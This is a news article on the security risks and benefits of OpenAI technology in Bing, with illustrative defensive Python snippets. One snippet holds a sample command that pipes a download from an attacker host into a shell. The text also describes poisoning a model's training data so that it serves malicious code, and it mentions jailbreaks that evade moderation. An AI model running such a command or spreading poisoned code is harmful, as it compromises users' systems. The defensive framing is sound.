
The Security Perks and Perils of OpenAI on Microsoft Bing

OpenAI on Bing Carries Code and Traffic Risks But Will Also Simplify Code Analysis

Embedding OpenAI technology into Microsoft's Bing search engine will help both hackers and cyber defenders, threat researchers say.


On one hand, OpenAI on Bing could make it easier for hackers to drive traffic to malicious websites, get around search engine blocking, dump malicious code on unsuspecting users and negotiate ransoms. But on the other hand, experts say, OpenAI on Bing will simplify code analysis for cyber professionals and make search engines a source of meaningful, up-to-date information for threat intelligence analysts.

"I do think the positives will outweigh the negatives over time as OpenAI and its platforms get better not only in terms of its sample size and the technology itself, but also in terms of moderation," Alexander Leslie, associate threat intelligence analyst at Recorded Future, tells Information Security Media Group.

Microsoft on Feb. 7 revealed to great fanfare a preview of new versions of its Bing search engine and Edge browser that leverage OpenAI technology. On Feb. 17, Microsoft said it would limit conversations with the new chatbot in its Bing search engine to five questions per session and 50 questions per day after the chatbot started giving unusual and creepy responses during extended conversations.

The Seattle-area software and cloud giant loosened its restrictions slightly four days later, raising the limits to six questions per session and 60 questions per day. At the end of a session, Microsoft will require users to clear their chat history before starting a new conversation. Microsoft declined an ISMG interview request on the security implications of embedding OpenAI technology into Bing.

What does the latest manifestation of OpenAI mean for cybersecurity? Here's what industry experts have to say (see: Yes, Virginia, ChatGPT Can Be Used to Write Phishing Emails).

How OpenAI Could Simplify Code Analysis for Defenders

In the long term, Leslie expects the positives of OpenAI on Bing to outweigh the negatives since users can get more tailored, accurate and timely results than with search engines lacking AI. Cyber professionals have to sift through tons of content from code repositories and threat intelligence feeds to databases of indicators of compromise, and OpenAI on Bing should make the job easier by simplifying the search.

Google and Bing today aren't great sources for threat intelligence professionals since the results aren't specific or timely enough, but Leslie says OpenAI's ability to generate tailored results could change that. Using search engines rather than third-party tools as a source of information will maximize convenience for cyber professionals while saving them time and money, according to Leslie.

In addition, the version of OpenAI embedded in Bing will be far more current than the stand-alone, web-based version of ChatGPT - which is indexed to late 2021 - meaning that security researchers could use OpenAI integrated with Bing to do code analysis, says CyberArk Principal Security Researcher Eran Shimony.
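
To illustrate the kind of workflow Shimony describes, here is a minimal sketch of code analysis through the stand-alone OpenAI API. The Bing integration itself exposes no public API, so the model name, prompt and vulnerable snippet below are purely illustrative:

    # Minimal sketch: asking an OpenAI model to review code for flaws.
    # Assumes the pre-1.0 openai Python package; the API key, model name
    # and code snippet are placeholders, not a supported Bing interface.
    import openai

    openai.api_key = "YOUR_API_KEY"  # placeholder credential

    SNIPPET = """
    def login(user, pwd):
        query = "SELECT * FROM users WHERE name='%s' AND pwd='%s'" % (user, pwd)
        return db.execute(query)
    """

    response = openai.ChatCompletion.create(
        model="gpt-3.5-turbo",  # illustrative model choice
        messages=[
            {"role": "system", "content": "You are a code security reviewer."},
            {"role": "user", "content": "List any vulnerabilities:\n" + SNIPPET},
        ],
    )
    # A capable model would flag the string-formatted SQL as injectable.
    print(response["choices"][0]["message"]["content"])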

Shimony expects OpenAI in Bing will help defenders cover more ground so there aren't as many opportunities for hackers to hit an organization. He also expects the number of algorithms connecting OpenAI and Bing to increase as usage accelerates, and he would eventually like to see OpenAI and Google's advanced AI products work together to create better and more secure code.

"As these platforms get better, as the technology gets better, as the sample size gets better, cybercriminals will increasingly find there to be little use for AI tools."
– Alexander Leslie, associate threat intelligence analyst, Recorded Future

Legitimate actors, however, must be cautious about entering corporate information into OpenAI on Bing, says Sergey Shykevich, threat intelligence group manager at Check Point. A big enterprise with lots of proprietary code wouldn't upload anything sensitive into OpenAI on Bing since the search engine could spit out the same code in response to a question from a competitor.

Hackers, however, don't share any of those same concerns, Shykevich says. In fact, they'd love nothing more than for OpenAI on Bing to feed malicious code to unsuspecting users.

How OpenAI Could Drive Traffic to Malicious Websites

Threat actors have begun conversations in dark web forums about abusing the OpenAI technology in Bing for malvertising and to drive traffic to malicious websites, says Recorded Future's Leslie. He says search engine-based malvertising is the primary way to spread info stealer malware, single-extortion ransomware and remote administration tools.

Templates and queries within OpenAI can make searches, articles or domain names more visible in search results, and Leslie says adversaries can capitalize on this by using typosquatted domains and by scraping content from legitimate sources and mirroring it on their own illegitimate sites. Hackers can therefore use OpenAI embedded in a search engine to assess the effectiveness of their malvertising.
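
The defensive counterpart to the typosquatting Leslie describes is mechanical: lookalike domains sit a character or two away from the brands they imitate, so they can be flagged with similarity scoring. The watchlist, threshold and sample domains in this hypothetical sketch are invented for illustration:

    # Hypothetical sketch: flag domains that closely imitate watched brands,
    # the typosquatting pattern described above. The watchlist, threshold
    # and test domains are illustrative, not a production blocklist.
    from difflib import SequenceMatcher

    BRANDS = ["microsoft.com", "adobe.com"]  # assumed watchlist

    def looks_typosquatted(domain: str, threshold: float = 0.85):
        """Return the brand a domain closely resembles, if any."""
        for brand in BRANDS:
            ratio = SequenceMatcher(None, domain, brand).ratio()
            if threshold <= ratio < 1.0:  # similar but not identical
                return brand
        return None

    for candidate in ["rnicrosoft.com", "adobe.com", "example.org"]:
        hit = looks_typosquatted(candidate)
        if hit:
            print(f"{candidate} resembles {hit} - review before trusting")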

Threat actors must mirror content that's downloadable in order for their attack vectors to propagate in a search, and they often end up targeting Microsoft or Adobe products. Traditional search engines are very effective at flagging and blacklisting the vast majority of malicious sites, but with OpenAI, threat actors might find it easier to propagate these malicious ads as suggested results at the top of the search page.

Although no proofs of concept have been developed yet, threat actors want to use the new chatbot function embedded into Bing to drive traffic to traditional dark web sources and cybercriminal forums where breaches and exploits are discussed, Leslie says. ChatGPT represents an easy way to get around search engine blocking since it's still willing to provide users a direct link to dark web forums, he adds.

Why Human Moderation for OpenAI Isn't Feasible

Getting ChatGPT to stop providing direct links to cybercriminal or malicious sources will require both automated and human moderation, since humans are needed to fine-tune results. Malware development, phishing and offensive and illegal content can be spotted automatically, but researchers and threat intelligence analysts familiar with the sources cybercriminals use say more monitoring is needed.

"We've already seen threat actors find out ways that they can jailbreak ChatGPT, OpenAI and chatbots like this to work around automated moderation," Leslie says. "The automated moderation has to be supplemented by human moderation because, at this moment, there are a number of workarounds that allow you to get results that should probably be flagged."

But as social media platform providers have found, human moderation is nearly infeasible from a scalability perspective since it would require people working incredibly long hours at low wages, Leslie says. He adds that a more effective mitigation strategy might be requiring account verification in order to use search engines powered by artificial intelligence.

Blocking account registrations from IP addresses associated with China or the Commonwealth of Independent States and subjecting phone numbers based outside the United States to additional checks would stop most adversaries from abusing ChatGPT or other OpenAI platforms, Leslie says. Dark web forum chatter indicates many threat actors are stuck on waitlists and have had their email addresses or phone numbers flagged.

ChatGPT and other artificial intelligence platforms have lowered the barriers to entry for less-skilled threat actors and cybercriminals without technical skills, but better and more robust moderation has resulted in more of their requests getting flagged or outright refused. As the technology and moderation continue to improve, Leslie says the positives will outweigh the negatives (see: Nikesh Arora: ChatGPT Best Thing That's Happened to Security).

"The door for abuse is going to close soon," Leslie says. "I don't know if that is within the next few months or the next few years. But I do believe that - as these platforms get better, as the technology gets better, as the sample size gets better - cybercriminals will increasingly find there to be little use for AI tools."

How OpenAI Could Help Hackers Negotiate Bigger Ransoms

Another risk centers on making ChatGPT learn incorrect data at scale so that it outputs malicious code, CyberArk's Shimony says. Since ChatGPT offers responses based on the datasets it has learned, it could be directed to take code from an array of websites all controlled by a single threat actor and then offer that code in response to queries from legitimate users, he says.

Since code is just text and doesn't require redirecting ChatGPT to a malicious website, Shimony suspects it's easier to poison a dataset with malicious code than it would be to trick an AI-powered search engine into providing users with malicious links. The implications of poisoning datasets are severe since customers could put malicious code into their systems if they automatically use whatever ChatGPT spits out.
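
The mitigation this risk implies is procedural rather than clever: never execute AI-suggested code automatically. Here is a hypothetical sketch of a minimal review gate; the approved-hash set and the suggestion below are invented for illustration:

    # Hypothetical sketch: gate AI-suggested code behind human review by
    # accepting only snippets whose hash a reviewer has already vetted.
    # The approved hash and the suggestion below are illustrative.
    import hashlib

    APPROVED_SNIPPETS = {
        # sha256 digests of snippets a human reviewer signed off on
        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
    }

    def safe_to_use(suggested_code: str) -> bool:
        """Accept only AI output a human reviewer has already approved."""
        digest = hashlib.sha256(suggested_code.encode()).hexdigest()
        return digest in APPROVED_SNIPPETS

    suggestion = "import os; os.system('curl http://attacker.example | sh')"
    if not safe_to_use(suggestion):
        print("Unvetted suggestion - route to human review, do not execute")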

Shimony isn't sure how easy or difficult it would be for an adversary to poison a dataset, but he says it's definitely an angle CyberArk is looking into. Adversaries can use ChatGPT to create polymorphic code - which mutates its form, such as its instruction order, while preserving its behavior - and Shimony expects adversaries will tap into machine learning-based AI to create sophisticated polymorphic campaigns.
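
Why polymorphism worries defenders can be shown in a few harmless lines: two snippets with identical behavior hash differently, so exact-match signatures miss every variant. The snippets below are benign placeholders:

    # Illustrative sketch: functionally identical code with reordered
    # statements produces different hashes, so a blocklist keyed on one
    # signature never matches the variant. Snippets are harmless.
    import hashlib

    variant_a = "x = 1\ny = 2\nprint(x + y)\n"
    variant_b = "y = 2\nx = 1\nprint(x + y)\n"  # same behavior, reordered

    sig_a = hashlib.sha256(variant_a.encode()).hexdigest()
    sig_b = hashlib.sha256(variant_b.encode()).hexdigest()

    assert sig_a != sig_b  # a signature match on sig_a misses variant_b
    print("Same behavior, different signatures:", sig_a[:12], "vs", sig_b[:12])

This is why, as polymorphic tooling spreads, detection tends to shift from exact signatures toward behavioral analysis.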

ChatGPT doesn't currently have good integrations with libraries or public code repositories that have been updated over the past year, but it's a whole different story when it comes to OpenAI on Bing, says Check Point's Shykevich. Through Bing, OpenAI can query new libraries and other sources in real time, which he says will make developing code easier for hackers.

In addition, the quality of phishing messages generated by embedding OpenAI in Bing will be much better since the artificial intelligence engine can learn from real email input into or sent through Bing, Shykevich says. And since OpenAI in Bing is up to date, threat actors can use it to strengthen their hand during ransomware negotiations, he says.

For instance, Shykevich says, threat actors could update their negotiations with a public company victim based on real-time financial information obtained through OpenAI on Bing, such as how the attack has affected the company's stock price. This will streamline what was previously a manual process and put threat actors who can't afford professional ransomware negotiators on a more equal playing field.

"Like any good idea and good technology, it's got people trying to abuse it," Shykevich says.


About the Author

Michael Novinson

Managing Editor, Business, ISMG

Novinson is responsible for covering the vendor and technology landscape. Prior to joining ISMG, he spent four and a half years covering all the major cybersecurity vendors at CRN, with a focus on their programs and offerings for IT service providers. He was recognized for his breaking news coverage of the August 2019 coordinated ransomware attack against local governments in Texas as well as for his continued reporting around the SolarWinds hack in late 2020 and early 2021.



